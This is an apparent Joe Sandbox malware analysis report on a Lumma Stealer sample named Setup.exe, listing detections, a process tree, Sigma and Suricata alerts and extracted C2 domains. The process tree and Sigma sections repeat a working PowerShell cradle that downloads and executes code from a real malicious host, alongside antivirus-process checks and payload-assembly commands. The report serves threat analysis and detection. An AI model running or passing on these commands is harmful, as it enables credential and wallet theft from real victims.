Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Setup.exe

Overview

General Information

Sample name:Setup.exe
Analysis ID:1584737
MD5:ede2e7d64a73a46b252525a4136b47bf
SHA1:5025d1d817d6d9f24f1d5197759fafe7cde6f0da
SHA256:bda506a1ae73f5514cbf100a95f54aeb2877368702fad312fabf0f2641b34f91
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample or dropped binary is a compiled AutoHotkey binary
Sample uses string decryption to hide its real strings
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • Setup.exe (PID: 5780 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: EDE2E7D64A73A46B252525A4136B47BF)
    • cmd.exe (PID: 5892 cmdline: "C:\Windows\System32\cmd.exe" /c move Archive Archive.cmd & Archive.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 5620 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5516 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 6536 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6388 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6596 cmdline: cmd /c md 811185 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 6672 cmdline: extrac32 /Y /E Thousand MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 6640 cmdline: findstr /V "makes" Makes MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5808 cmdline: cmd /c copy /b 811185\M.com + Symbol + Bang + Sons + Prefix + Re + Answers + Frank + Chancellor + Enable 811185\M.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 6668 cmdline: cmd /c copy /b ..\Gather + ..\Intend + ..\Couple + ..\Und + ..\Desktop + ..\Laboratories + ..\Leonard c MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • M.com (PID: 1532 cmdline: M.com c MD5: 62D09F076E6E0240548C2F837536A46A)
        • powershell.exe (PID: 1220 cmdline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 1372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • T0VC3MU5SNNFXQB43V5.exe (PID: 5608 cmdline: "C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe" MD5: 51F99EDDD33CC04FB0F55F873B76D907)
          • T0VC3MU5SNNFXQB43V5.tmp (PID: 1120 cmdline: "C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmp" /SL5="$60296,7785838,845824,C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe" MD5: F809F51E678B7F2E388F8C969EF902C8)
            • T0VC3MU5SNNFXQB43V5.exe (PID: 5556 cmdline: "C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe" /VERYSILENT MD5: 51F99EDDD33CC04FB0F55F873B76D907)
              • T0VC3MU5SNNFXQB43V5.tmp (PID: 6180 cmdline: "C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp" /SL5="$70296,7785838,845824,C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe" /VERYSILENT MD5: F809F51E678B7F2E388F8C969EF902C8)
                • timeout.exe (PID: 6360 cmdline: "timeout" 9 MD5: 100065E21CFBBDE57CBA2838921F84D6)
                  • conhost.exe (PID: 1708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • cmd.exe (PID: 4432 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 3692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 1712 cmdline: tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 4980 cmdline: find /I "wrsa.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 1656 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 7040 cmdline: tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 6380 cmdline: find /I "opssvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 5892 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • cmd.exe (PID: 4676 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 2748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 3472 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 1268 cmdline: find /I "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 1288 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 3552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 5676 cmdline: tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 5168 cmdline: find /I "nswscsvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 3288 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 5432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 5516 cmdline: tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 1568 cmdline: find /I "sophoshealth.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • BrightLib.exe (PID: 5428 cmdline: "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe" MD5: 6A8860A8150021B2D5B9BB707DE4FA37)
      • choice.exe (PID: 4308 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
      • conhost.exe (PID: 5336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 3772 cmdline: tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • find.exe (PID: 5320 cmdline: find /I "avastui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["framekgirus.shop", "yokesandusj.sbs", "cloudewahsj.shop", "tirepublicerj.shop", "noisycuttej.shop", "wholersorie.shop", "rabidcowse.shop", "nearycrepso.shop", "abruptyopsn.shop"], "Build id": "hRjzG3--TRON"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: PowerShell Download and Execution Cradles
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: M.com c, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com, ParentProcessId: 1532, ParentProcessName: M.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 1220, ProcessName: powershell.exe
        Sigma detected: Suspicious PowerShell Parameter Substring
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: M.com c, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com, ParentProcessId: 1532, ParentProcessName: M.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 1220, ProcessName: powershell.exe
        Sigma detected: Change PowerShell Policies to an Insecure Level
        Source: Process startedAuthor: frack113: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: M.com c, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com, ParentProcessId: 1532, ParentProcessName: M.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 1220, ProcessName: powershell.exe
        Sigma detected: PowerShell Web Download
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: M.com c, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com, ParentProcessId: 1532, ParentProcessName: M.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 1220, ProcessName: powershell.exe
        Sigma detected: Usage Of Web Request Commands And Cmdlets
        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: M.com c, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com, ParentProcessId: 1532, ParentProcessName: M.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 1220, ProcessName: powershell.exe
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: M.com c, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com, ParentProcessId: 1532, ParentProcessName: M.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 1220, ProcessName: powershell.exe

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Sigma detected: Search for Antivirus process
        Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Archive Archive.cmd & Archive.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5892, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 6388, ProcessName: findstr.exe

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-06T12:16:42.314150+010020283713Unknown Traffic192.168.2.549842104.21.44.159443TCP
        2025-01-06T12:16:43.277898+010020283713Unknown Traffic192.168.2.549846104.21.44.159443TCP
        2025-01-06T12:16:44.508617+010020283713Unknown Traffic192.168.2.549853104.21.44.159443TCP
        2025-01-06T12:16:45.564061+010020283713Unknown Traffic192.168.2.549860104.21.44.159443TCP
        2025-01-06T12:16:46.693463+010020283713Unknown Traffic192.168.2.549867104.21.44.159443TCP
        2025-01-06T12:16:48.136643+010020283713Unknown Traffic192.168.2.549877104.21.44.159443TCP
        2025-01-06T12:16:49.164360+010020283713Unknown Traffic192.168.2.549888104.21.44.159443TCP
        2025-01-06T12:16:50.509865+010020283713Unknown Traffic192.168.2.549897104.21.44.159443TCP
        2025-01-06T12:16:52.602900+010020283713Unknown Traffic192.168.2.549910104.21.44.159443TCP
        2025-01-06T12:16:53.792055+010020283713Unknown Traffic192.168.2.549920185.161.251.21443TCP
        2025-01-06T12:16:54.558874+010020283713Unknown Traffic192.168.2.549927172.67.208.58443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-06T12:16:42.805604+010020546531A Network Trojan was detected192.168.2.549842104.21.44.159443TCP
        2025-01-06T12:16:43.751262+010020546531A Network Trojan was detected192.168.2.549846104.21.44.159443TCP
        2025-01-06T12:16:53.072951+010020546531A Network Trojan was detected192.168.2.549910104.21.44.159443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-06T12:16:42.805604+010020498361A Network Trojan was detected192.168.2.549842104.21.44.159443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-06T12:16:43.751262+010020498121A Network Trojan was detected192.168.2.549846104.21.44.159443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-06T12:16:55.007739+010020084381A Network Trojan was detected172.67.208.58443192.168.2.549927TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-06T12:16:45.040597+010020480941Malware Command and Control Activity Detected192.168.2.549853104.21.44.159443TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus detection for URL or domain
        Source: https://dfgh.online/invoker.php?compName=user-PCAvira URL Cloud: Label: malware
        Found malware configuration
        Source: 0000000D.00000003.2478687315.000000000462E000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["framekgirus.shop", "yokesandusj.sbs", "cloudewahsj.shop", "tirepublicerj.shop", "noisycuttej.shop", "wholersorie.shop", "rabidcowse.shop", "nearycrepso.shop", "abruptyopsn.shop"], "Build id": "hRjzG3--TRON"}
        Multi AV Scanner detection for dropped file
        Source: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exeReversingLabs: Detection: 78%
        Multi AV Scanner detection for submitted file
        Source: Setup.exeVirustotal: Detection: 8%Perma Link
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 84.8% probability
        Sample uses string decryption to hide its real strings
        Source: 0000000D.00000003.2478687315.000000000462E000.00000004.00000800.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
        Source: 0000000D.00000003.2478687315.000000000462E000.00000004.00000800.00020000.00000000.sdmpString decryptor: rabidcowse.shop
        Source: 0000000D.00000003.2478687315.000000000462E000.00000004.00000800.00020000.00000000.sdmpString decryptor: noisycuttej.shop
        Source: 0000000D.00000003.2478687315.000000000462E000.00000004.00000800.00020000.00000000.sdmpString decryptor: tirepublicerj.shop
        Source: 0000000D.00000003.2478687315.000000000462E000.00000004.00000800.00020000.00000000.sdmpString decryptor: framekgirus.shop
        Source: 0000000D.00000003.2478687315.000000000462E000.00000004.00000800.00020000.00000000.sdmpString decryptor: wholersorie.shop
        Source: 0000000D.00000003.2478687315.000000000462E000.00000004.00000800.00020000.00000000.sdmpString decryptor: abruptyopsn.shop
